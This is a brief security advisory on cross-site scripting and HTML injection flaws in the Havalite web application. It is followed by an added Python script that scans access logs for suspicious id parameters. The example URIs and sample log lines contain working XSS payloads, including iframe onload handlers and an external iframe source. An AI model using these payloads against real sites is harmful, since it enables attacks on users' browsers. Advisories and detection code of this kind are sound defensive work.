Havalite Multiple Cross Site Scripting and HTML Injection Vulnerabilities

An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.

The following example URIs are available:

http://www.example.com/havalite/hava_post.php?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/havalite/hava_user.php?userId=>"<iframe src=http://www.vulnerability-lab.com>
http://www.example.com/havalite/hava_link.php?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
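
For defenders reviewing web server logs, the following added example (not part of the original advisory and not Havalite code) flags requests to the three scripts above whose id parameter is not a plain integer. It assumes that legitimate postId, userId and linkId values are decimal integers and that the log uses the common combined access-log format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and id parameters named in the advisory's example URIs.
AFFECTED = {
    "hava_post.php": "postId",
    "hava_user.php": "userId",
    "hava_link.php": "linkId",
}
# Assumption: a legitimate id is a plain decimal integer (allow-list check).
VALID_ID = re.compile(r"\d+")
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.*?) HTTP/[\d.]+"')

def suspicious_ids(log_lines):
    """Return (script, param, decoded_value) for each non-integer id seen."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = AFFECTED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes once; a double-encoded value still
        # fails the integer check, so it is reported as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and not VALID_ID.fullmatch(value):
                hits.append((script, param, value))
    return hits

# Constructed sample log: two benign requests, two matching the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /havalite/hava_post.php?postId=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /havalite/hava_post.php'
    '?postId=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 200 5301',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /havalite/hava_link.php'
    '?linkId=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 200 4988',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /havalite/index.php?page=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for script, param, value in suspicious_ids(SAMPLE_LOG):
        print(f"{script}: {param}={value!r}")
```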


 

Copyright 2010, SecurityFocus